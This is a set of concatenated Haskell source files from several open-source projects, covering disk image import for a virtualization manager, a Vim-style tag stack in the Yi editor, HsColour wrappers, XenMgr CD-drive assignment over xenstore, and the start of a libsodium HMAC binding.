importISO :: DiskImage -> Import ImportedDiskImage
importISO img = ImportedDiskImage <$> pure (diID img) <*> imp where
  imp = case diFile img of
    Nothing -> return $ IDIData "/storage/null.iso" Nothing
    Just fr -> IDIData <$> importISOFile fr <*> pure Nothing
-- Log a progress message to stderr (usable in any MonadIO context).
inform m = liftIO (hPutStrLn stderr m)
-- | Strip the temporary-name marker from the image (and key) paths once
-- the files are fully written.
untemp :: IDIData -> Import IDIData
untemp (IDIData vhd (Just key)) = IDIData <$> untempFileName vhd <*> (Just <$> untempFileName key)
untemp (IDIData vhd Nothing) = IDIData <$> untempFileName vhd <*> pure Nothing
-- | Import a raw filesystem image: create a VHD of the declared capacity,
-- optionally set up encryption, then dd the source image onto the
-- (possibly encrypted) tap device.  A source file is mandatory.
importRawFilesystem :: AppID -> DiskImage -> Import ImportedDiskImage
importRawFilesystem appid img = ImportedDiskImage <$> pure (diID img) <*> imp where
  imp = do
    name <- nameVhdFor appid img
    case diFile img of
      Nothing -> throwError $ FilesystemImageFileNotSpecified (show $ diID img)
      Just fr -> do
        vhd <- createVhd name (fromIntegral capacityMBs)
        key <- setupEncryption vhd (diEncryption img)
        removeFileOnError vhd $ do
          src <- fileSrcPath <$> fileSourceFromR fr
          inform $ printf "copying filesystem image %s -> %s" (show fr) name
          withCryptoVhdTap vhd $ \dev -> do
            ddFile src dev
            sync
          untemp (IDIData vhd key)
  -- capacity in MB, rounded to upper bound
  capacityMBs = round $ diCapacity img `divMod` (1024*1024) where round (x,y) = x + signum y
-- | Import a VHD image.  With no source file, create an empty VHD of the
-- declared capacity; otherwise copy the provided VHD.  Encryption keys
-- are set up in either case.
importDiskImageVHD :: AppID -> DiskImage -> Import ImportedDiskImage
importDiskImageVHD appid img = ImportedDiskImage <$> pure (diID img) <*> imp where
  imp :: Import IDIData
  imp = do
    name <- nameVhdFor appid img
    case diFile img of
      Nothing -> do
        vhd <- createVhd name (fromIntegral capacityMBs)
        key <- setupEncryption vhd (diEncryption img)
        untemp (IDIData vhd key)
      Just fr -> do
        vhd <- tempFileName =<< importVHDFile name fr
        key <- setupEncryption vhd (diEncryption img)
        untemp (IDIData vhd key)
  -- capacity in MB, rounded to upper bound
  capacityMBs = round $ diCapacity img `divMod` (1024*1024) where round (x,y) = x + signum y
-- | Import a CPIO archive: create a VHD, make a filesystem on it (ext3
-- unless the image declares one), mount it, and unpack the archive into
-- it.  A source file is mandatory.
importCPIO :: AppID -> DiskImage -> Import ImportedDiskImage
importCPIO appid img = ImportedDiskImage <$> pure (diID img) <*> imp where
  imp = do
    name <- nameVhdFor appid img
    case diFile img of
      Nothing -> throwError $ CPIOImageFileNotSpecified (show $ diID img)
      Just fr -> do
        src <- fileSourceFromR fr
        -- create vhd, make filesystem on it, extract cpio archive
        vhd <- createVhd name (fromIntegral capacityMBs)
        key <- setupEncryption vhd (diEncryption img)
        removeFileOnError vhd $ do
          withCryptoVhdTap vhd $ \dev -> do
            mkfs (fromMaybe Ext3 (diFilesystem img)) dev
            withMountedDev dev $ \dst -> extractAppCpio src dst >> sync
          untemp (IDIData vhd key)
  -- capacity in MB, rounded to upper bound
  capacityMBs = round $ diCapacity img `divMod` (1024*1024) where round (x,y) = x + signum y
-- figure out basename for vhd image, possibly appending instance uuid if not shared
-- | Basename for an image's VHD file: @appid-imageid[-instanceuuid].vhd@.
-- Non-shared images get a fresh uuid so each disk has a distinct file.
-- (NB: the appliance version 'appver' is currently not part of the name.)
nameVhdFor :: AppID -> DiskImage -> Import String
nameVhdFor (AppID appid appver) img = do
  instanceID <- if diShared img then pure Nothing else Just . show <$> liftIO uuidGen
  return (diskname instanceID)
  where
    diskname instanceID = appid ++ "-" ++ imgid ++ instid ++ ".vhd" where
      DiskImageID imgid = diID img
      instid = case instanceID of
        Nothing -> ""
        Just s -> '-':s
-- | Create an empty VHD of the given size (MB) under the disk folder,
-- registering it for cleanup; returns the (temp-marked) path.
createVhd :: FilePath -> Int -> Import FilePath
createVhd filename sizeMB = do
  path <- tempFileName =<< ((</> filename) <$> diskFolder)
  addImportFile path
  inform ("creating VHD " ++ path ++ " capacity=" ++ show sizeMB ++ " MB")
  liftIO $ createDirectoryIfMissing True (takeDirectory path)
  _ <- liftIO $ readProcessOrDie "vhd-util" ["create", "-s", show sizeMB, "-n", path] ""
  return path
-- | Number of allocated blocks in a VHD as reported by @vhd-util query@;
-- unparsable output counts as 0.
allocatedBlockCount :: FilePath -> IO Int
allocatedBlockCount vhd = do
  countStr <- liftIO $ readProcessOrDie "vhd-util" ["query", "-a", "-n", vhd] ""
  return $ fromMaybe 0 $ maybeRead countStr
-- | Set up encryption for a VHD according to the image's declaration:
-- generate a fresh key of the requested size, or import a provided key
-- file.  Returns the key file path, or Nothing for unencrypted images.
setupEncryption :: FilePath -> DiskEncryption -> Import (Maybe FilePath)
setupEncryption vhd e = case e of
  NoEncryption -> return Nothing
  (GenerateCryptoKey bits) -> do
    key <- createKeyFile bits vhd
    setVhdKey vhd key
    return (Just key)
  (UseCryptoKey fileRes) -> do
    key <- tempFileName =<< importEncryptionKeyFile vhd fileRes
    setVhdKey vhd key
    return (Just key)
  where
    -- Install the key on the VHD, but only while no data blocks are
    -- allocated yet (shared logic previously duplicated in both branches).
    setVhdKey vhd key = do
      blocks <- liftIO $ allocatedBlockCount vhd
      when (blocks == 0) $
        void $ liftIO $ readProcessOrDie "vhd-util" ["key", "-s", "-n", vhd, "-k", key] ""
    -- NOTE(review): currently unused; presumably intended for validating
    -- requested key sizes -- confirm before removing.
    valid_keysizes = [ 256, 512 ]
    keyPath vhd bits = do
      dir <- cryptoKeysFolder
      return $ dir </> encryptionKeyFileName vhd bits
    -- copy the first n bytes of s to d
    copy s d n = liftIO (BL.readFile s >>= return . BL.take n >>= BL.writeFile d)
    createKeyFile bits vhd = do
      inform $ "... generating encryption key of size " ++ show bits ++ ", please move mouse to fill system entropy buffer faster"
      let src = "/dev/random"
      dst <- tempFileName =<< keyPath vhd bits
      addImportFile dst
      -- (a redundant duplicate 'return dst' after this line was removed)
      copy src dst (fromIntegral $ bits `div` 8)
      return dst
-- | Create a tapdisk device of the given type over an image file,
-- returning the device node path printed by @tap-ctl@.
tapCreate ty extraEnv path = do
    exist <- doesFileExist path
    -- fixed: the error message was missing a space after the path
    unless exist $ error ("file " ++ show path ++ " does not exist")
    chomp <$> readProcessOrDieWithEnv extraEnv "tap-ctl" ["create", "-a", ty++":"++path] ""
-- | VHD-backed tap device.
tapCreateVhd = tapCreate "vhd"
-- | Tear down a tap device created by 'tapCreate'.
tapDestroy dev = void $ readProcessOrDie "tap-ctl" ["destroy","-d",dev] ""
-- | 'E.finally' with its arguments flipped.
finally' = flip E.finally
-- | Run an action on a tap device over a (possibly encrypted) VHD,
-- pointing tapdisk at this import's crypto key directory.
withCryptoVhdTap :: FilePath -> (FilePath -> IO a) -> Import a
withCryptoVhdTap vhdfile action = do
    keys <- tempFileName =<< cryptoKeysFolder
    liftIO $ withVhdTap [("TAPDISK2_CRYPTO_KEYDIR", keys)] vhdfile action
-- | Bracketed tap device lifetime: create, run the action on the device
-- node, always destroy.
withVhdTap :: [(String,String)] -> FilePath -> (FilePath -> IO a) -> IO a
withVhdTap extraenv vhdfile action = E.bracket (tapCreateVhd extraenv vhdfile) tapDestroy action
-- | Flush filesystem buffers to disk.
sync = void $ readProcessOrDie "sync" [] ""
-- | Make a filesystem (or swap area) on a device; for ext filesystems,
-- disable periodic fsck and reserved blocks afterwards via tune2fs.
mkfs :: FilesystemType -> FilePath -> IO ()
mkfs fs dev = do
    let (cmd,args) | fs == Swap = ( "mkswap", [dev])
                   | otherwise = (("mkfs." ++ filesystemStr fs), [dev])
    inform (cmd ++ " " ++ intercalate " " args)
    void $ readProcessOrDie cmd args ""
    when (fs `elem` [Ext2, Ext3, Ext4]) $ tunefs dev
  where tunefs dev = void $ readProcessOrDie "tune2fs" ["-i", "0", "-c", "-1", "-m", "0", dev] ""
-- | Mount a device on a directory.
mount :: FilePath -> FilePath -> IO ()
mount dev dir = void $ readProcessOrDie "mount" [dev, dir] ""
-- | Unmount a directory.
umount :: FilePath -> IO ()
umount dir = void $ readProcessOrDie "umount" [dir] ""
-- | Mount a device on a fresh temp directory, run the action, and always
-- unmount afterwards.
withMountedDev :: FilePath -> (FilePath -> IO a) -> IO a
withMountedDev dev action =
    withTempDirectory $ \tempdir -> do
      mount dev tempdir
      action tempdir `E.finally` umount tempdir
-- | Delete the given file if the action fails, then rethrow.
removeFileOnError :: FilePath -> Import a -> Import a
removeFileOnError file f =
    f `catchError` (\err -> liftIO (removeFile file) >> throwError err)
| jean-edouard/manager | apptool/Import/Images.hs | gpl-2.0 | 12,543 | 0 | 25 | 2,917 | 4,045 | 2,016 | 2,029 | 256 | 5 |
{-# LANGUAGE CPP #-}
{-# LANGUAGE DeriveDataTypeable #-}
{-# LANGUAGE DeriveGeneric #-}
{-# LANGUAGE FlexibleContexts #-}
{-# LANGUAGE LambdaCase #-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE TemplateHaskell #-}
{-# OPTIONS_HADDOCK show-extensions #-}
-- |
-- Module : Yi.Keymap.Vim.Tag
-- License : GPL-2
-- Maintainer : yi-devel@googlegroups.com
-- Stability : experimental
-- Portability : portable
module Yi.Keymap.Vim.Tag
( completeVimTag
, gotoTag
, nextTag
, popTag
, unpopTag
) where
import GHC.Generics (Generic)
import Control.Applicative ((<$>))
import Control.Lens (view)
import Control.Monad (foldM, void)
import Data.Binary (Binary (..))
import Data.Default (Default (..))
import Data.Maybe (maybeToList)
import Data.Monoid ((<>))
import qualified Data.Text as T (Text)
import Data.Typeable (Typeable)
import System.Directory (doesFileExist)
import System.FilePath (takeDirectory, (</>))
import System.FriendlyPath (userToCanonPath)
import Yi.Buffer
import Yi.Core (errorEditor)
import Yi.Editor
import Yi.File (openingNewFile)
import Yi.Keymap (YiM)
import Yi.Tag
import Yi.Types (YiVariable)
import Yi.Utils (io)
-- | List of tags and the file/line/char that they originate from.
-- (the location that :tag or Ctrl-[ was called from).
data VimTagStack = VimTagStack
    { tagStackList :: [(Tag, Int, FilePath, Int, Int)]
      -- ^ tag, match index, and the file/line/column the jump came from
    , tagStackIndex :: Int
      -- ^ position of the next free slot; entries at or above it have
      -- been popped but remain available for 'unpopTag'
    } deriving (Typeable, Generic)
instance Default VimTagStack where
    def = VimTagStack [] 0
instance YiVariable VimTagStack
instance Binary VimTagStack
-- | Returns tag, tag index, filepath, line number, char number
getTagList :: EditorM [(Tag, Int, FilePath, Int, Int)]
getTagList = tagStackList <$> getEditorDyn

-- | Current index into the tag stack.
getTagIndex :: EditorM Int
getTagIndex = tagStackIndex <$> getEditorDyn

-- | Replace the stored tag stack, keeping the index unchanged.
setTagList :: [(Tag, Int, FilePath, Int, Int)] -> EditorM ()
setTagList tl = do
    stack <- getEditorDyn
    putEditorDyn $ stack { tagStackList = tl }

-- | Replace the stored tag stack index, keeping the list unchanged.
setTagIndex :: Int -> EditorM ()
setTagIndex ti = do
    stack <- getEditorDyn
    putEditorDyn $ stack { tagStackIndex = ti }
-- | Push tag at index: truncate any previously-popped entries above the
-- index, append the new entry, and advance the index.
pushTagStack :: Tag -> Int -> FilePath -> Int -> Int -> EditorM ()
pushTagStack tag ind fp ln cn = do
    tl <- getTagList
    ti <- getTagIndex
    setTagList $ (take ti tl) ++ [(tag, ind, fp, ln, cn)]
    setTagIndex $ ti + 1
-- | Get tag and decrement index (so that when a new push is done, the current
-- tag is popped).  Returns Nothing if the stack is empty or already at
-- the bottom.
popTagStack :: EditorM (Maybe (Tag, Int, FilePath, Int, Int))
popTagStack = do
    tl <- getTagList
    ti <- getTagIndex
    case tl of
      [] -> return Nothing
      _ -> case ti of
        0 -> return Nothing
        _ -> setTagIndex (ti - 1) >> return (Just $ tl !! (ti - 1))
-- | Opens the file that contains @tag@. Uses the global tag table or uses
-- the first valid tag file in @TagsFileList@.
-- | Jump to the @ind@-th match of @tag@.  @ret@ is the return location
-- to record on the tag stack; when Nothing, the current buffer position
-- is recorded instead.
gotoTag :: Tag -> Int -> Maybe (FilePath, Int, Int) -> YiM ()
gotoTag tag ind ret =
    void . visitTagTable $ \tagTable -> do
      let lis = lookupTag tag tagTable
      if (length lis) <= ind
        then errorEditor $ "tag not found: " <> _unTag tag
        else do
          bufinf <- withCurrentBuffer bufInfoB
          let (filename, line) = lis !! ind
              (fn, ln, cn) = case ret of
                Just ret' -> ret'
                Nothing -> (bufInfoFileName bufinf,
                            bufInfoLineNo bufinf,
                            bufInfoColNo bufinf)
          withEditor $ pushTagStack tag ind fn ln cn
          openingNewFile filename $ gotoLn line
-- | Goes to the next tag. (:tnext)  Re-pops the most recent entry and
-- jumps to the following match of the same tag.
nextTag :: YiM ()
nextTag = do
    prev <- withEditor popTagStack
    case prev of
      Nothing -> errorEditor $ "tag stack empty"
      Just (tag, ind, fn, ln, cn) -> gotoTag tag (ind + 1) (Just (fn, ln, cn))
-- | Return to location from before last tag jump. (Ctrl-T / :pop)
popTag :: YiM ()
popTag = do
    tl <- withEditor getTagList
    case tl of
      [] -> errorEditor "tag stack empty"
      _ -> do
        posloc <- withEditor popTagStack
        case posloc of
          Nothing -> errorEditor "at bottom of tag stack"
          Just (_, _, fn, ln, cn) -> openingNewFile fn $ moveToLineColB ln cn
-- | Go to next tag in the tag stack. Represents :tag without any
-- specified tag.
-- | Re-ascend the tag stack (inverse of 'popTag'): jump to the entry at
-- the current index, recording the present location in its place.
unpopTag :: YiM ()
unpopTag = do
    tl <- withEditor getTagList
    ti <- withEditor getTagIndex
    if ti >= length tl
      then case tl of
        [] -> errorEditor "tag stack empty"
        _ -> errorEditor "at top of tag stack"
      else let (tag, ind, _, _, _) = tl !! ti
           in void . visitTagTable $ \tagTable -> do
              let lis = lookupTag tag tagTable
              if (length lis) <= ind
                then errorEditor $ "tag not found: " <> _unTag tag
                else do
                  bufinf <- withCurrentBuffer bufInfoB
                  let (filename, line) = lis !! ind
                      ln = bufInfoLineNo bufinf
                      cn = bufInfoColNo bufinf
                      fn = bufInfoFileName bufinf
                      -- overwrite the slot at ti with the current location
                      tl' = take ti tl
                            ++ (tag, ind, fn, ln, cn):(drop (ti + 1) tl)
                  withEditor $ setTagList tl'
                  openingNewFile filename $ gotoLn line
-- | Complete a partial tag name against the tag table (empty list when
-- no table is available).
completeVimTag :: T.Text -> YiM [T.Text]
completeVimTag s =
    fmap maybeToList . visitTagTable $ return . flip completeTag s
-- | Gets the first valid tags file in @TagsFileList@, if such a valid
-- file exists.
-- | First existing tags file from the configured @TagsFileList@, if any.
tagsFile :: YiM (Maybe FilePath)
tagsFile = do
    candidates <- view tagsFileList <$> askCfg
    foldM firstValid Nothing candidates
  where
    -- keep the first hit; only probe further entries while none found
    firstValid (Just found) _ = return (Just found)
    firstValid Nothing f = tagsFileLocation f
-- | Handles paths of the form ./[path], which represents a tags file relative
-- to the path of the current directory of a file rather than the directory
-- of the process.
-- | Resolve one @TagsFileList@ entry to an existing file, if possible.
-- Entries of the form @./path@ are taken relative to the directory of
-- the current buffer's file rather than the process's working directory.
tagsFileLocation :: String -> YiM (Maybe FilePath)
tagsFileLocation s
  | length s < 2 || take 2 s /= "./" = check s
  | otherwise = do
      let s' = drop 2 s
      dir <- takeDirectory <$>
               (withCurrentBuffer $ bufInfoB >>= return . bufInfoFileName)
      check $ dir </> s'
  where check f = do
          -- canonicalise (expanding ~) before testing for existence
          f' <- io $ userToCanonPath f
          fileExists <- io $ doesFileExist f'
          if fileExists
            then return $ Just f'
            else return Nothing
-- | Call continuation @act@ with the TagTable. Uses the global table
-- or, if it doesn't exist, uses the first valid tag file in
-- @TagsFileList@.
-- | Call continuation @act@ with the TagTable.  Uses the cached global
-- table; otherwise imports the first valid tags file, caches it, and
-- uses that.  Returns Nothing (after reporting) when no table exists.
visitTagTable :: (TagTable -> YiM a) -> YiM (Maybe a)
visitTagTable act = do
    posTagTable <- withEditor getTags
    case posTagTable of
      Just tagTable -> Just <$> act tagTable
      Nothing -> do
        f <- tagsFile
        case f of
          Nothing -> errorEditor "No tags file" >> return Nothing
          Just f' -> do
            tagTable <- io $ importTagTable f'
            -- cache for subsequent lookups
            withEditor $ setTags tagTable
            Just <$> act tagTable
| TOSPIO/yi | src/library/Yi/Keymap/Vim/Tag.hs | gpl-2.0 | 7,521 | 0 | 24 | 2,507 | 1,973 | 1,022 | 951 | -1 | -1 |
{-# LANGUAGE CPP #-}
module HsColour(hsColourHTML, hsColourConsole) where
#ifdef GPL_SCARES_ME
-- Stub implementations: with GPL_SCARES_ME defined the GPL-licensed
-- hscolour package is not linked, and both colourisers are identity.
hsColourConsole :: IO (String -> String)
hsColourConsole = return id
hsColourHTML :: String -> String
hsColourHTML = id
#else
import Language.Haskell.HsColour.TTY as TTY
import Language.Haskell.HsColour.Colourise
import Language.Haskell.HsColour.CSS as CSS
-- | ANSI-colourise Haskell source for the terminal, honouring the
-- user's .hscolour preferences (read once, up front).
hsColourConsole :: IO (String -> String)
hsColourConsole = do
    prefs <- readColourPrefs
    return $ TTY.hscolour prefs
-- | Colourise Haskell source as CSS-classed HTML.
hsColourHTML :: String -> String
hsColourHTML = CSS.hscolour False 1
#endif
| mpickering/hlint | src/HsColour.hs | bsd-3-clause | 560 | 0 | 7 | 83 | 53 | 32 | 21 | 11 | 1 |
--
-- Copyright (c) 2014 Citrix Systems, Inc.
--
-- This program is free software; you can redistribute it and/or modify
-- it under the terms of the GNU General Public License as published by
-- the Free Software Foundation; either version 2 of the License, or
-- (at your option) any later version.
--
-- This program is distributed in the hope that it will be useful,
-- but WITHOUT ANY WARRANTY; without even the implied warranty of
-- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- GNU General Public License for more details.
--
-- You should have received a copy of the GNU General Public License
-- along with this program; if not, write to the Free Software
-- Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
--
{-# LANGUAGE ScopedTypeVariables #-}
module XenMgr.CdLock
(
getCdDeviceVms
, getCdDeviceStickyVm
, getVmStickyCdDevices
, assignCdDevice
, assignStickyCdDevice
, unassignCdDevice
, unassignStickyCdDevice
, ejectCdDevice
, notifyCdDeviceAssignmentChanged
, updateCdDeviceMediaStatusKey
) where
import Data.Maybe
import Data.String
import Control.Applicative
import Control.Monad
import qualified Control.Exception as E
import Text.Printf
import System.Timeout
import System.IO.Unsafe
import System.FilePath
import Vm.Types
import Vm.DomainCore
import Vm.Queries
import XenMgr.Rpc
import XenMgr.Host
import Tools.XenStore
import Tools.Db
import Tools.Log
import Tools.Misc
import Tools.File
import Tools.Process
import System.Directory
import Control.Concurrent
import Rpc.Autogen.XenmgrNotify
import XenMgr.Notify
import XenMgr.Expose.ObjectPaths
import Data.Map (Map)
import qualified Data.Map as Map
-- Seconds to wait for a bsgdev request node in xenstore to be consumed
-- by the guest before giving up.
requestTimeout = 5
-- cd assignment
-- | Block until @node@ disappears from xenstore, giving up after
-- @timeout_secs@ seconds.  True iff the node vanished within the timeout.
xsWaitForNodeToDisappear :: Int -> String -> IO Bool
xsWaitForNodeToDisappear timeout_secs node = do
    outcome <- timeout (10 ^ 6 * timeout_secs) (xsWaitFor node vanished)
    return (isJust outcome)
  where
    vanished = isNothing <$> xsRead node
-- | Xenstore node under which device @a:b:c:d@ is advertised to the guest.
cdDeviceXsNode :: DomainID -> BSGDevice -> String
cdDeviceXsNode domid (BSGDevice a b c d) =
    printf "/local/domain/%d/bsgdev/%d_%d_%d_%d" domid a b c d
-- | Xenstore node used to post assignment/eject requests for the device.
cdDeviceXsReqNode :: DomainID -> BSGDevice -> String
cdDeviceXsReqNode domid (BSGDevice a b c d) =
    printf "/local/domain/%d/bsgdev-req/%d_%d_%d_%d" domid a b c d
-- | Database path persisting the "sticky" VM assignment of the device.
cdDeviceStickyNode :: BSGDevice -> String
cdDeviceStickyNode (BSGDevice a b c d) =
    printf "/xenmgr/cdassign/%d_%d_%d_%d" a b c d
-- | True iff the domain's xenstore lock key for @dev@ holds "1".
getCdDeviceLockStatus :: DomainID -> BSGDevice -> IO Bool
getCdDeviceLockStatus domid dev = do
    lockValue <- xsRead (cdDeviceXsNode domid dev ++ "/lock")
    return (lockValue == Just "1")
-- | Probe whether media is present in the drive, by asking udev's
-- cdrom_id helper.  False when the block device cannot be found, and —
-- deliberately best-effort — False on ANY exception from the probe.
getCdDeviceMediaStatus :: BSGDevice -> IO Bool
getCdDeviceMediaStatus dev =
  fromBdev =<< findBlockDevice dev where
    fromBdev Nothing = return False
    fromBdev (Just bdev) =
      (parse <$> readProcessOrDie "/lib/udev/cdrom_id" [bdev] "")
      `E.catch` (\(_ :: E.SomeException) -> return False)
    -- cdrom_id prints KEY=VALUE lines; media present iff this exact line
    -- appears.
    parse = ("ID_CDROM_MEDIA=1" `elem`) . lines
-- | Refresh the host-side xenstore media key for @dev@ ("1"/"0"),
-- writing only when the value actually changed to avoid spurious watches.
updateCdDeviceMediaStatusKey :: BSGDevice -> IO ()
updateCdDeviceMediaStatusKey dev =
  update (key dev) =<< (strstate <$> getCdDeviceMediaStatus dev) where
    key (BSGDevice a b c d) = printf "/xenclient/bsgdev/%d_%d_%d_%d/media" a b c d
    strstate True = "1"
    strstate _ = "0"
    -- Read-compare-write: skip the write when the key already holds v.
    update path v = do
      v' <- xsRead path
      when (Just v /= v') $ xsWrite path v
-- | Domain IDs of all running VMs that currently hold the lock on @dev@.
getCdDeviceDomains :: BSGDevice -> Rpc [DomainID]
getCdDeviceDomains dev = do
    domids <- catMaybes <$> (mapM getDomainID =<< getVms)
    filterM (\domid -> liftIO (getCdDeviceLockStatus domid dev)) domids
-- return (vm uuid, sticky bit) tuples: VMs currently holding the lock
-- plus the VM (if any) the device is persistently assigned to.
-- NOTE(review): a VM that is both running-locked and sticky appears
-- twice in (running ++ stickies) — confirm callers tolerate duplicates.
getCdDeviceVms :: BSGDevice -> Rpc [(Uuid,Bool)]
getCdDeviceVms dev = do
  running <- catMaybes <$> (mapM getDomainUuid =<< getCdDeviceDomains dev)
  stickies <- getVmsBy (isStickyTo dev)
  return $ map (\vm -> (vm, vm `elem` stickies)) (running ++ stickies)
-- | Ask the guest in domain @domid@ to release CD device @dev@: write the
-- req-eject trigger node and wait for the guest to consume it.  No-op when
-- the domain does not currently hold the device lock.  Calls 'error' if
-- the request is not consumed within 'requestTimeout' seconds.
unassignCdDevice' :: BSGDevice -> DomainID -> IO ()
unassignCdDevice' dev domid = do
  assigned <- getCdDeviceLockStatus domid dev
  when assigned $ do
    let ejectnode = cdDeviceXsReqNode domid dev ++ "/req-eject"
    xsWrite ejectnode "1"
    r <- xsWaitForNodeToDisappear requestTimeout ejectnode
    -- idiom: 'unless r' replaces 'when (not r)'
    unless r $ error "unassign failed"
-- | Release @dev@ from every running domain that currently holds it.
unassignCdDevice :: BSGDevice -> Rpc ()
unassignCdDevice dev = do
    holders <- getCdDeviceDomains dev
    mapM_ (liftIO . unassignCdDevice' dev) holders
-- | Ask the guest running VM @uuid@ (if any) to take CD device @dev@:
-- write the req-assign trigger node and wait for the guest to consume it.
-- No-op when the VM has no running domain or already holds the lock.
-- Calls 'error' if the request is not consumed within 'requestTimeout'
-- seconds.
assignCdDevice :: BSGDevice -> Uuid -> Rpc ()
assignCdDevice dev@(BSGDevice a b c d) uuid = withDomain =<< getDomainID uuid where
  withDomain Nothing = return ()
  withDomain (Just domid) = liftIO $ do
    assigned <- getCdDeviceLockStatus domid dev
    -- idiom: 'unless assigned' replaces 'when (not assigned)'
    unless assigned $ do
      info $ "assigning CD device " ++ (printf "%d:%d:%d:%d" a b c d) ++ " to vm " ++ show uuid
      let assignnode = cdDeviceXsReqNode domid dev ++ "/req-assign"
      xsWrite assignnode "1"
      r <- xsWaitForNodeToDisappear requestTimeout assignnode
      unless r $ error "assign of CD device failed"
-- | Remove the persistent assignment of @dev@ and release it from any
-- domain currently holding it.
unassignStickyCdDevice :: BSGDevice -> Rpc ()
unassignStickyCdDevice dev = do
  dbRm (cdDeviceStickyNode dev)
  unassignCdDevice dev
-- | Persistently assign @dev@ to @uuid@: first release it everywhere,
-- record the assignment in the database, then hand it to the VM's
-- running domain (if any).
assignStickyCdDevice :: BSGDevice -> Uuid -> Rpc ()
assignStickyCdDevice dev uuid = do
  unassignCdDevice dev
  dbWrite (cdDeviceStickyNode dev) uuid
  withDomain =<< getDomainID uuid
  where
    -- domid is bound but unused: assignCdDevice re-resolves the domain.
    withDomain (Just domid) = assignCdDevice dev uuid
    withDomain _ = return ()
-- | VM that @dev@ is persistently ("sticky") assigned to, if any.
-- An empty database entry means no assignment.
getCdDeviceStickyVm :: BSGDevice -> Rpc (Maybe Uuid)
getCdDeviceStickyVm dev = do
    stored <- dbRead (cdDeviceStickyNode dev)
    return $ if null stored
               then Nothing
               else Just (fromString stored)
-- | Is @dev@ persistently assigned to @vm@?
isStickyTo :: BSGDevice -> Uuid -> Rpc Bool
isStickyTo dev vm = do
    owner <- getCdDeviceStickyVm dev
    return (owner == Just vm)
-- | All host BSG devices persistently assigned to VM @uuid@.
getVmStickyCdDevices :: Uuid -> Rpc [BSGDevice]
getVmStickyCdDevices uuid = do
    devs <- liftIO getHostBSGDevices
    filterM (`isStickyTo` uuid) devs
-- | Physically eject the media in @dev@ via the external @eject@ tool.
-- Does nothing when no matching block device node can be found.
ejectCdDevice :: BSGDevice -> IO ()
ejectCdDevice dev = do
    mblock <- findBlockDevice dev
    case mblock of
      Nothing    -> return ()
      Just block -> do
        info $ "ejecting " ++ block
        void $ readProcessOrDie "eject" [block] []
-- | Map a SCSI address to its /dev block node by scanning sysfs: a block
-- device matches when /sys/class/block/X/device/scsi_device/a:b:c:d
-- exists.  Returns the first match, or Nothing.
findBlockDevice :: BSGDevice -> IO (Maybe FilePath)
findBlockDevice scsi =
  get <$> (filterM test =<< list "/sys/class/block") where
    list path = map (path </>) <$> getDirectoryContents_nonDotted path
    test path = doesDirectoryExist (path </> "device" </> "scsi_device" </> fname scsi)
    fname (BSGDevice a b c d) = printf "%d:%d:%d:%d" a b c d
    -- first sysfs match, translated to its /dev node
    get [] = Nothing
    get (x:_) = Just ("/dev" </> takeBaseName x)
-- Module-global map of per-device scheduled notify tasks (used by
-- 'notifyCdDeviceAssignmentChanged').  The unsafePerformIO global idiom:
-- NOINLINE is required so exactly one MVar is ever created.
cdAssignChangedTasks :: MVar (Map BSGDevice ScheduledTask)
{-# NOINLINE cdAssignChangedTasks #-}
cdAssignChangedTasks = unsafePerformIO (newMVar Map.empty)
-- | Emit the D-Bus "cd assignment changed" signal for @dev@, via a keyed
-- task (1.0 — presumably seconds; confirm updateKeyedNotifyTask docs) so
-- rapid changes per device are coalesced.  With no owning VM the signal
-- carries an empty uuid and object path "/".
notifyCdDeviceAssignmentChanged :: (MonadRpc e m) => BSGDevice -> m ()
notifyCdDeviceAssignmentChanged dev = do
  updateKeyedNotifyTask 1.0 dev cdAssignChangedTasks $ do
    action =<< getCdDeviceVms dev
  where
    action [] =
      notifyComCitrixXenclientXenmgrCdAssignmentChanged xenmgrObjectPath (bsgDeviceIdStr dev) "" (fromString "/")
    action ((vm,sticky):_) = do
      -- update media state on lock transference
      liftIO $ updateCdDeviceMediaStatusKey dev
      -- dbus signal
      notifyComCitrixXenclientXenmgrCdAssignmentChanged xenmgrObjectPath (bsgDeviceIdStr dev) (show vm) (vmObjPath vm)
| jean-edouard/manager | xenmgr/XenMgr/CdLock.hs | gpl-2.0 | 7,416 | 0 | 17 | 1,400 | 2,066 | 1,040 | 1,026 | 155 | 2 |
module RecordIn2 where
-- Two single-field record constructors sharing the field name @x@.
data S = S1 { x :: Int } | S2 { x :: Int } deriving Show
{- map2 xs = map (\y -> S1 {x = 1}) xs -}
-- NOTE(review): appears to be the mechanically unfolded form of the
-- 'map' shown above (refactoring-tool output); the tuple's @f@/@n@
-- components are artifacts of the transformation.
map2 xs = (case ((\ y -> S1 {x = 1}), xs, 1) of
             (f, [], n) -> []
             (f, (x : xs), n) -> (f x) : (map2 xs))
module Main where
import Foo
import System.Exit
-- | Trivial driver: succeed iff 'fooTest' accepts an empty argument list.
main :: IO ()
main = if fooTest [] then exitSuccess else exitFailure
| tolysz/prepare-ghcjs | spec-lts8/cabal/Cabal/tests/PackageTests/BenchmarkExeV10/benchmarks/bench-Foo.hs | bsd-3-clause | 127 | 0 | 9 | 28 | 47 | 24 | 23 | 6 | 1 |
{-# OPTIONS_GHC -fno-warn-missing-signatures #-}
{-# LANGUAGE RecordWildCards #-}
{- |
See the documentation in "Crypto.Sodium.Auth".
-}
module Crypto.Sodium.Auth.HmacSha512
( -- * Constants
keyBytes -- | Number of bytes in an authentication 'Key'.
, tagBytes -- | Number of bytes in an authentication 'Tag'.
-- * Types
, Key -- | Authentication 'Key'
, mkKey -- | Smart constructor for 'Key'. Verifies that the length of the
-- parameter is 'keyBytes'.
, unKey -- | Returns the contents of a 'Key'
, Tag -- | Authentication 'Tag'
, mkTag -- | Smart constructor for 'Tag'. Verifies thta the length of the
-- parameter is 'tagBytes'
, unTag -- | Returns the contents of a 'Tag'
-- * Key Generation
, randomKey -- | Randomly generates a 'Key' for authentication.
-- * Authentication/Verification
, authenticate -- | Authenticates a message using a secret 'Key'
, verify -- | Returns 'True' if 'Tag' is a correct authenticator
-- of a message under a secret 'Key'. Otherwise it returns 'False'.
, hmacSha512
) where
import qualified Crypto.Sodium.Auth.Internal as A
import Foreign.C.Types (CInt (..), CULLong (..))
-- Raw bindings into libsodium's HMAC-SHA-512 primitive.
foreign import ccall unsafe "crypto_auth_hmacsha512_bytes"
  c_crypto_auth_hmacsha512_bytes :: CInt
foreign import ccall unsafe "crypto_auth_hmacsha512_keybytes"
